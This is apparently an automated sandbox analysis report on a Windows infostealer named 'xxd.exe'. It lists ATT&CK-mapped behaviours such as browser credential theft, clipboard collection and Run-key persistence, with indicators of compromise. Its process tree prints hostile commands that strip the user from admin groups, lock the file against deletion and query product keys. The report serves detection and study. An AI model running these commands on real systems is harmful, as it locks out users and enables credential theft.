d1d620a61f00160ea1d9688cbd1a9455f5e77a539f456922abb0ba251fd296e8

Analysis

max time kernel
151s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/09/2024, 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

xxd.exe
Size

164.7MB
MD5

3b8f4adf61f01f882591e9e113d65acf
SHA1

b324ec054ea0e4654a9bfb3d297a49891b50b988
SHA256

5ebe1ef5b37f06a9a11482c424f5d8e5f9a7cc964c857dc7fe7e2cd284182ce5
SHA512

d517db7414c85476f98e26e4a1a99203e8fe74a9b7600d3085a7c28139bb5461a99cf0c8a7e3274429cf16bbfc806c2663b6eb5c3535d71e4bc30a0b1746ca5c
SSDEEP

1572864:63lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:PPvt1x2z5m1ij

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	xxd.exe

Clipboard Data 1 TTPs 64 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2196	powershell.exe
2836	powershell.exe
1668	powershell.exe
4656	powershell.exe
952	cmd.exe
4644	cmd.exe
3012	cmd.exe
1688	cmd.exe
4528	cmd.exe
4652	powershell.exe
1636	powershell.exe
3524	powershell.exe
1940	powershell.exe
4756	powershell.exe
540	cmd.exe
1056	powershell.exe
3248	powershell.exe
2376	cmd.exe
4940	powershell.exe
1232	cmd.exe
4068	powershell.exe
4304	powershell.exe
3704	cmd.exe
3356	powershell.exe
4740	cmd.exe
4356	cmd.exe
3572	powershell.exe
2308	cmd.exe
4624	cmd.exe
2312	powershell.exe
4884	cmd.exe
1668	cmd.exe
4908	powershell.exe
3216	cmd.exe
688	powershell.exe
4164	powershell.exe
1204	powershell.exe
2936	cmd.exe
1440	powershell.exe
2128	powershell.exe
4540	cmd.exe
3888	cmd.exe
4840	powershell.exe
2120	cmd.exe
3956	cmd.exe
4776	powershell.exe
4536	cmd.exe
2944	powershell.exe
1628	powershell.exe
1080	powershell.exe
3652	cmd.exe
4960	cmd.exe
376	powershell.exe
2196	cmd.exe
4900	cmd.exe
4984	cmd.exe
5020	powershell.exe
4756	powershell.exe
1032	powershell.exe
468	cmd.exe
3152	cmd.exe
468	powershell.exe
2140	cmd.exe
516	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xxd.exe	xxd.exe

Loads dropped DLL 3 IoCs

pid	Process
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2344	icacls.exe
1648	icacls.exe
4764	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupDqrF7k = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\xxd.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
135	raw.githubusercontent.com
64	raw.githubusercontent.com
88	raw.githubusercontent.com
89	raw.githubusercontent.com
90	raw.githubusercontent.com
115	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ipinfo.io
28	ipinfo.io

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2088	cmd.exe
1308	powershell.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4404	cmd.exe
1232	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3300	powershell.exe
4184	powershell.exe
1776	powershell.exe
4796	powershell.exe
3960	powershell.exe
1976	powershell.exe
1536	powershell.exe
4748	powershell.exe
3308	powershell.exe
5116	powershell.exe
3708	powershell.exe
864	powershell.exe
1804	powershell.exe
1232	powershell.exe
4608	powershell.exe
4104	powershell.exe
4044	powershell.exe
4528	powershell.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2552	cmd.exe
4800	netsh.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	xxd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	xxd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xxd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	xxd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	xxd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	xxd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	xxd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4984	WMIC.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
3960	powershell.exe
3960	powershell.exe
5116	powershell.exe
5116	powershell.exe
1976	powershell.exe
1976	powershell.exe
5116	powershell.exe
4608	powershell.exe
4608	powershell.exe
3308	powershell.exe
3308	powershell.exe
3960	powershell.exe
4608	powershell.exe
3308	powershell.exe
1976	powershell.exe
1936	powershell.exe
1936	powershell.exe
2524	powershell.exe
2524	powershell.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe
2364	xxd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3844	WMIC.exe
Token: SeSecurityPrivilege	3844	WMIC.exe
Token: SeTakeOwnershipPrivilege	3844	WMIC.exe
Token: SeLoadDriverPrivilege	3844	WMIC.exe
Token: SeSystemProfilePrivilege	3844	WMIC.exe
Token: SeSystemtimePrivilege	3844	WMIC.exe
Token: SeProfSingleProcessPrivilege	3844	WMIC.exe
Token: SeIncBasePriorityPrivilege	3844	WMIC.exe
Token: SeCreatePagefilePrivilege	3844	WMIC.exe
Token: SeBackupPrivilege	3844	WMIC.exe
Token: SeRestorePrivilege	3844	WMIC.exe
Token: SeShutdownPrivilege	3844	WMIC.exe
Token: SeDebugPrivilege	3844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3844	WMIC.exe
Token: SeRemoteShutdownPrivilege	3844	WMIC.exe
Token: SeUndockPrivilege	3844	WMIC.exe
Token: SeManageVolumePrivilege	3844	WMIC.exe
Token: 33	3844	WMIC.exe
Token: 34	3844	WMIC.exe
Token: 35	3844	WMIC.exe
Token: 36	3844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3844	WMIC.exe
Token: SeSecurityPrivilege	3844	WMIC.exe
Token: SeTakeOwnershipPrivilege	3844	WMIC.exe
Token: SeLoadDriverPrivilege	3844	WMIC.exe
Token: SeSystemProfilePrivilege	3844	WMIC.exe
Token: SeSystemtimePrivilege	3844	WMIC.exe
Token: SeProfSingleProcessPrivilege	3844	WMIC.exe
Token: SeIncBasePriorityPrivilege	3844	WMIC.exe
Token: SeCreatePagefilePrivilege	3844	WMIC.exe
Token: SeBackupPrivilege	3844	WMIC.exe
Token: SeRestorePrivilege	3844	WMIC.exe
Token: SeShutdownPrivilege	3844	WMIC.exe
Token: SeDebugPrivilege	3844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3844	WMIC.exe
Token: SeRemoteShutdownPrivilege	3844	WMIC.exe
Token: SeUndockPrivilege	3844	WMIC.exe
Token: SeManageVolumePrivilege	3844	WMIC.exe
Token: 33	3844	WMIC.exe
Token: 34	3844	WMIC.exe
Token: 35	3844	WMIC.exe
Token: 36	3844	WMIC.exe
Token: SeShutdownPrivilege	2364	xxd.exe
Token: SeCreatePagefilePrivilege	2364	xxd.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 4148	2364	xxd.exe	87
PID 2364 wrote to memory of 4148	2364	xxd.exe	87
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 860	2364	xxd.exe	89
PID 2364 wrote to memory of 700	2364	xxd.exe	90
PID 2364 wrote to memory of 700	2364	xxd.exe	90
PID 4148 wrote to memory of 3844	4148	cmd.exe	126
PID 4148 wrote to memory of 3844	4148	cmd.exe	126
PID 2364 wrote to memory of 4664	2364	xxd.exe	92
PID 2364 wrote to memory of 4664	2364	xxd.exe	92
PID 2364 wrote to memory of 1920	2364	xxd.exe	93
PID 2364 wrote to memory of 1920	2364	xxd.exe	93
PID 2364 wrote to memory of 4312	2364	xxd.exe	95
PID 2364 wrote to memory of 4312	2364	xxd.exe	95
PID 2364 wrote to memory of 2508	2364	xxd.exe	96
PID 2364 wrote to memory of 2508	2364	xxd.exe	96
PID 2364 wrote to memory of 3312	2364	xxd.exe	98
PID 2364 wrote to memory of 3312	2364	xxd.exe	98
PID 2364 wrote to memory of 4180	2364	xxd.exe	99
PID 2364 wrote to memory of 4180	2364	xxd.exe	99
PID 2364 wrote to memory of 636	2364	xxd.exe	103
PID 2364 wrote to memory of 636	2364	xxd.exe	103
PID 2364 wrote to memory of 4716	2364	xxd.exe	135
PID 2364 wrote to memory of 4716	2364	xxd.exe	135
PID 2364 wrote to memory of 4036	2364	xxd.exe	106
PID 2364 wrote to memory of 4036	2364	xxd.exe	106
PID 4312 wrote to memory of 3960	4312	cmd.exe	110
PID 4312 wrote to memory of 3960	4312	cmd.exe	110
PID 3312 wrote to memory of 3308	3312	cmd.exe	111
PID 3312 wrote to memory of 3308	3312	cmd.exe	111
PID 4664 wrote to memory of 1976	4664	cmd.exe	112
PID 4664 wrote to memory of 1976	4664	cmd.exe	112
PID 1920 wrote to memory of 5116	1920	cmd.exe	113
PID 1920 wrote to memory of 5116	1920	cmd.exe	113
PID 2508 wrote to memory of 4608	2508	cmd.exe	114
PID 2508 wrote to memory of 4608	2508	cmd.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3128	attrib.exe

C:\Users\Admin\AppData\Local\Temp\xxd.exe
"C:\Users\Admin\AppData\Local\Temp\xxd.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2364 get ExecutablePath"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=2364 get ExecutablePath
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- C:\Users\Admin\AppData\Local\Temp\xxd.exe
  "C:\Users\Admin\AppData\Local\Temp\xxd.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\arrepiente" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1972 --field-trial-handle=1980,i,1463292394047088282,18078551241590827800,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:860
- C:\Users\Admin\AppData\Local\Temp\xxd.exe
  "C:\Users\Admin\AppData\Local\Temp\xxd.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\arrepiente" --mojo-platform-channel-handle=2100 --field-trial-handle=1980,i,1463292394047088282,18078551241590827800,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Administrateurs' -Member 'Admin'""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Administrateurs' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member 'Admin'""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Power Users' -Member 'Admin'""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Power Users' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Administrators' -Member 'Admin'""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Administrators' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(Get-LocalUser -Name 'Admin').PrincipalSource""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(Get-LocalUser -Name 'Admin').PrincipalSource"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "icacls "C:\Users\Admin\AppData\Local\Temp\xxd.exe" /deny Admin:(DE,DC)"
  2⤵
  PID:4180
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\Temp\xxd.exe" /deny Admin:(DE,DC)
    3⤵
    - Modifies file permissions
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "net session"
  2⤵
  PID:636
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:1076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:4716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
  2⤵
  PID:4036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic OS get caption, osarchitecture
    3⤵
    PID:5080
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
  2⤵
  PID:3348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:452
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
  2⤵
  PID:2196
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4984
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  2⤵
  PID:1912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
  2⤵
  PID:692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2364 get ExecutablePath"
  2⤵
  PID:4716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=2364 get ExecutablePath
    3⤵
    PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:1564
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:3292
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
  2⤵
  PID:2164
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
    3⤵
    PID:3756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
  2⤵
  PID:4184
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
    3⤵
    PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
  2⤵
  PID:3252
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
    3⤵
    PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
  2⤵
  PID:4064
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
    3⤵
    PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
  2⤵
  PID:4644
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
  2⤵
  PID:2120
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
  2⤵
  PID:3880
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
    3⤵
    PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
  2⤵
  PID:3548
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
  2⤵
  PID:4216
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
    3⤵
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
  2⤵
  PID:1076
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
  2⤵
  PID:2304
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
    3⤵
    PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)""
  2⤵
  PID:3728
- - C:\Windows\system32\reg.exe
